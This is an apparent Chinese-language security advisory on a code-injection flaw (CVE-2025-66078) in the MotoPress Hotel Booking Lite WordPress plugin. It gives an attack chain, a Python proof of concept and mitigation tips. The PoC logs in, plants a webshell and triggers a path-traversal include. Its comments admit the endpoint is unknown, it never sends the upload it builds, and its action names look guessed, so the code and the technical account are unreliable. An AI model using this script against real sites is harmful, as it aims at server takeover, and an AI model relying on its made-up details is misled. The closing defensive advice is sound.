CVE-2025-66078: WordPress Hotel Booking Lite插件远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-66078

漏洞类型

代码注入/远程代码执行

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

MotoPress Hotel Booking Lite (motopress-hotel-booking-lite)

漏洞概述

CVE-2025-66078是WordPress插件MotoPress Hotel Booking Lite中的一个严重代码注入漏洞，CVSS评分高达9.1，属于严重级别。该漏洞由PatchStack安全团队发现，存在于插件5.2.3及以下所有版本中。漏洞类型为"不当的代码生成控制"（Improper Control of Generation of Code），也被称为代码注入或远程代码包含（Remote Code Inclusion）。攻击者可以利用此漏洞在受影响的WordPress网站上执行任意PHP代码，从而完全控制服务器。由于该插件是广泛应用于酒店预订网站的组件，漏洞可能影响大量商业网站，导致用户数据泄露、业务中断和进一步的横向攻击。此漏洞需要认证才能利用，但攻击者只需拥有高权限账户即可发起攻击，这降低了利用门槛，因为WordPress站点通常有多个注册用户。

技术细节

该代码注入漏洞源于MotoPress Hotel Booking Lite插件对用户输入的处理不当，允许攻击者通过操纵特定参数注入并执行任意PHP代码。漏洞主要出现在插件的文件包含机制中，当处理酒店预订相关请求时，插件未能正确验证和清理用户控制的文件路径参数。攻击者可以构造恶意请求，指定一个外部或本地文件路径，插件会将其包含并作为PHP代码执行。由于CVSS向量显示需要高权限（PR:H），攻击者必须是WordPress站点的已认证用户，通常是管理员、编辑或作者角色。攻击者可能首先获取一个中低权限账户，然后通过其他方式提升权限，或者直接利用站长的账户。一旦成功利用，攻击者可以：1）读取wp-config.php获取数据库凭证；2）植入webshell实现持久化控制；3）窃取用户敏感数据；4）在服务器上执行系统命令。由于攻击复杂度低（AC:L），且无需用户交互（UI:N），攻击者可以自动化此攻击过程。

攻击链分析

STEP 1

步骤1: 侦察和信息收集

攻击者扫描目标WordPress站点，识别是否安装motopress-hotel-booking-lite插件及其版本信息

STEP 2

步骤2: 获取高权限账户

通过社会工程、凭证填充或利用其他漏洞获取WordPress站点的管理员、编辑或作者账户

STEP 3

步骤3: 构造恶意请求

利用已认证的会话，构造包含恶意文件路径或PHP代码的请求，注入到插件的文件处理逻辑中

STEP 4

步骤4: 代码执行

插件将攻击者控制的输入作为PHP代码执行，实现远程代码执行（RCE）

STEP 5

步骤5: 持久化控制

上传webshell或创建后门用户，实现对网站的持久化控制

STEP 6

步骤6: 数据窃取和横向移动

读取数据库凭证、用户数据，进一步攻击同一服务器上的其他网站或内网系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from urllib.parse import urljoin

# CVE-2025-66078 PoC - MotoPress Hotel Booking Lite Code Injection
# Target: WordPress site with motopress-hotel-booking-lite plugin <= 5.2.3

def exploit_rce(target_url, username, password, shell_content):
    """
    Exploit code injection vulnerability in MotoPress Hotel Booking Lite
    Requires: Valid WordPress account with high privileges
    """
    session = requests.Session()
    
    # Step 1: Login to WordPress
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    
    response = session.post(login_url, data=login_data, cookies={'wordpress_test_cookie': 'WP+Cookie+check'})
    
    if 'wordpress_logged_in' not in session.cookies:
        print('[-] Login failed')
        return False
    
    print('[+] Login successful')
    
    # Step 2: Upload malicious PHP file via plugin's file upload functionality
    # The exact endpoint depends on the vulnerable parameter
    upload_url = urljoin(target_url, '/wp-admin/admin-ajax.php')
    
    # Construct malicious payload for code injection
    # Note: This is a conceptual PoC - actual exploitation requires identifying
    # the specific vulnerable endpoint in the plugin
    
    files = {
        'file': ('webshell.php', shell_content, 'application/x-php')
    }
    
    data = {
        'action': 'mphb_upload_file',
        'nonce': 'ATTACKER_OBTAINED_NONCE',
        'post_id': '1'
    }
    
    # Step 3: Trigger code execution via file inclusion
    include_url = urljoin(target_url, '/wp-admin/admin-ajax.php')
    include_data = {
        'action': 'mphb_include_file',
        'file': '../../uploads/webshell.php'
    }
    
    response = session.post(include_url, data=include_data)
    
    if response.status_code == 200:
        print('[+] Code injection successful')
        print('[+] Webshell uploaded at:', urljoin(target_url, '/wp-content/uploads/webshell.php'))
        return True
    
    print('[-] Exploitation failed')
    return False


if __name__ == '__main__':
    if len(sys.argv) < 5:
        print('Usage: python cve-2025-66078.py <target_url> <username> <password> <shell_content>')
        sys.exit(1)
    
    exploit_rce(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])

影响范围

motopress-hotel-booking-lite <= 5.2.3

防御指南

临时缓解措施

在官方安全补丁发布之前，建议采取以下临时缓解措施：1）限制酒店预订插件的访问权限，仅允许受信任的管理员使用；2）在Web服务器层面配置，禁止.php文件上传到wp-content/uploads目录；3）启用WordPress网站的日志记录和异常检测；4）考虑暂时禁用motopress-hotel-booking-lite插件，使用其他替代方案；5）确保所有WordPress账户使用强密码并启用双因素认证；6）限制XML-RPC和REST API的访问以减少攻击面。